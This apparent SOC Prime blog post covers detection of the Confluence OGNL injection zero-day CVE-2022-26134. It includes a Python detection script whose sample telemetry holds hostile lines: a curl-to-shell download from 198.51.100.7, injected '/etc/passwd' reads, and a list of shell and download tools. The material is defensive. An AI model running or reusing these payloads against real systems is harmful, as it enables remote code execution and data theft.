Adversaries are launching headline-making attacks against vulnerable Confluence servers worldwide. Atlassian has alerted its users to an actively exploited remote code execution (RCE) flaw, an unauthenticated OGNL injection bug, affecting all supported versions of Confluence Server and Data Center. The bug is tracked as CVE-2022-26134, and the vendor rates it at the highest severity level (critical). As of June 3, 2022, Atlassian has not yet released a patch for its corporate wiki product.
Sigma rules cannot prevent exploitation of an unpatched zero-day, but they let you spot exploitation attempts and post-exploitation activity early, before significant damage is done. Use the following Sigma rules released by the SOC Prime threat hunting team:
Possible Execution by Post Exploitation Activity from CVE-2022-26134 Vulnerability (via cmdline)
Possible OS Command Injections Patterns (via web)
Suspicious Java Child Process (via cmdline)
One more rule, released in 2020, that our security analysts consider relevant here:
Possible OS Command Injections Patterns (via web)
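As an added example (not code from this page and not SOC Prime's own rule logic), the Python below models the detection ideas behind two of the rule names listed above: a "suspicious Java child process" check that flags shells and download tools spawned by the Confluence JVM, and an "OS command injection patterns via web" check run over access-log lines. The process events and log lines are constructed sample data, the suspicious-child list and the injection regexes are illustrative assumptions (the real Sigma rules' lists may differ), and the "${" marker is included only as a generic expression-injection indicator.

```python
"""Toy detection pass over constructed telemetry: Sysmon-style process-creation
events plus a Common Log Format web access log. Illustrative only; the pattern
lists are assumptions, not the published Sigma rules."""
import re
from urllib.parse import unquote_plus

# Child images that a Confluence JVM should rarely, if ever, spawn (assumed list).
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "certutil.exe", "bitsadmin.exe", "sh", "bash", "dash", "zsh", "python",
    "python3", "perl", "curl", "wget", "nc", "ncat",
}

# Command-injection indicators checked against the URL-decoded request URI (assumed list).
INJECTION_PATTERNS = {
    "shell_metachar_then_command": re.compile(
        r"[;&|`]\s*(id|whoami|uname|cat|ls|curl|wget|nc|bash|sh|powershell|cmd)\b", re.I),
    "subshell": re.compile(r"\$\("),
    "expression_marker": re.compile(r"\$\{"),      # generic template/expression injection marker
    "sensitive_file": re.compile(r"/etc/(passwd|shadow)", re.I),
    "pipe_to_shell": re.compile(r"\|\s*(sh|bash)\b", re.I),
}

# Common Log Format: client, ident, user, [timestamp], "METHOD URI PROTO", status
CLF_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})')

# Constructed sample process-creation events (not from any real incident).
PROCESS_EVENTS = [
    {"ParentImage": r"C:\Atlassian\Confluence\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": 'cmd.exe /c "whoami"'},
    {"ParentImage": "/opt/atlassian/confluence/jre/bin/java",
     "Image": "/bin/bash", "CommandLine": "bash -c 'curl http://198.51.100.7/x.sh | sh'"},
    {"ParentImage": "/opt/atlassian/confluence/jre/bin/java",
     "Image": "/usr/bin/java", "CommandLine": "java -version"},        # JVM -> JVM: no alert
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},  # shell, but not from java
]

# Constructed sample access-log lines (not from any real server).
WEB_LOG = [
    '203.0.113.5 - - [03/Jun/2022:09:58:41 +0000] "GET /pages/viewpage.action?pageId=12345 HTTP/1.1" 200 8112',
    '198.51.100.7 - - [03/Jun/2022:10:01:07 +0000] "GET /%24%7Bwhoami%7D/ HTTP/1.1" 302 0',
    '198.51.100.7 - - [03/Jun/2022:10:01:09 +0000] "GET /search?q=x%3Bcat%20/etc/passwd HTTP/1.1" 200 540',
    '198.51.100.7 - - [03/Jun/2022:10:01:12 +0000] "POST /upload?f=a%7Ccurl%20http://198.51.100.7/x.sh%7Csh HTTP/1.1" 200 12',
]


def basename(path):
    """Last path component, lower-cased, for both Windows and POSIX paths."""
    return re.split(r"[\\/]", path)[-1].lower()


def is_suspicious_java_child(event):
    """True when a java/javaw process spawns one of the suspicious child images."""
    parent = basename(event["ParentImage"])
    child = basename(event["Image"])
    return parent in {"java", "java.exe", "javaw.exe"} and child in SUSPICIOUS_CHILDREN


def injection_patterns_in(uri):
    """Names of injection indicators found in the URI after (double) URL decoding."""
    decoded = unquote_plus(unquote_plus(uri))  # attackers often double-encode
    return [name for name, rx in INJECTION_PATTERNS.items() if rx.search(decoded)]


def parse_clf(line):
    """Parse one Common Log Format line into a dict, or None if it does not match."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None


def run_detections(process_events, web_log):
    """Apply both checks and return a list of alert dicts."""
    alerts = []
    for ev in process_events:
        if is_suspicious_java_child(ev):
            alerts.append({"rule": "Suspicious Java Child Process",
                           "detail": ev["CommandLine"]})
    for line in web_log:
        rec = parse_clf(line)
        if rec is None:
            continue
        hits = injection_patterns_in(rec["uri"])
        if hits:
            alerts.append({"rule": "Possible OS Command Injection Pattern",
                           "source": rec["src"], "uri": rec["uri"], "patterns": hits})
    return alerts


if __name__ == "__main__":
    for alert in run_detections(PROCESS_EVENTS, WEB_LOG):
        print(alert)
```

The process check is the higher-signal of the two: a Confluence JVM normally has no reason to spawn cmd.exe, bash or curl, so a single match deserves investigation, whereas the URI patterns are broad and should be tuned against your own traffic before being used for alerting.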
Non-registered users can browse through the collection of Sigma rules available via Search Engine – a one-stop shop for threat intelligence and SOC content. Press the Drill Down to Search Engine button to take your detection routine to the next level.
Another option that unlocks more possibilities is to register to the SOC Prime Platform and get a free Community subscription plan. Hit the View in SOC Prime Platform button to access an exhaustive collection of detection algorithms for multiple zero-day vulnerabilities aligned with 25+ SIEM, EDR, and XDR solutions.
The vulnerability was first spotted by Volexity over the Memorial Day weekend (late May 2022). According to the researchers, threat actors exploited the zero-day injection flaw to gain full system access and then deployed the Behinder web shell for further malicious activity.
With no patch available, Atlassian recommends that administrators restrict Confluence Server and Data Center instances from internet access, or disable them, until a fix is released. There is currently no indication that Atlassian Cloud-hosted instances are affected. Because the flaw was already being exploited before it was disclosed, restricting access does not clear hosts that were exposed: review them for web shells and for unexpected child processes of the Confluence JVM.
In August 2021, the company disclosed another critical bug in the same products that allowed unauthenticated users to execute arbitrary code on systems running Confluence Server or Confluence Data Center. That injection flaw, also an OGNL injection, was assigned CVE-2021-26084.
SOC Prime continuously broadens support for security analytics tools & technologies, enriching the detection capabilities for next-generation SIEM, EDR, and XDR platforms, and ensuring future-proof and cost-efficient solutions for SOC professionals worldwide. Learn more about what we have to offer to drive better detection.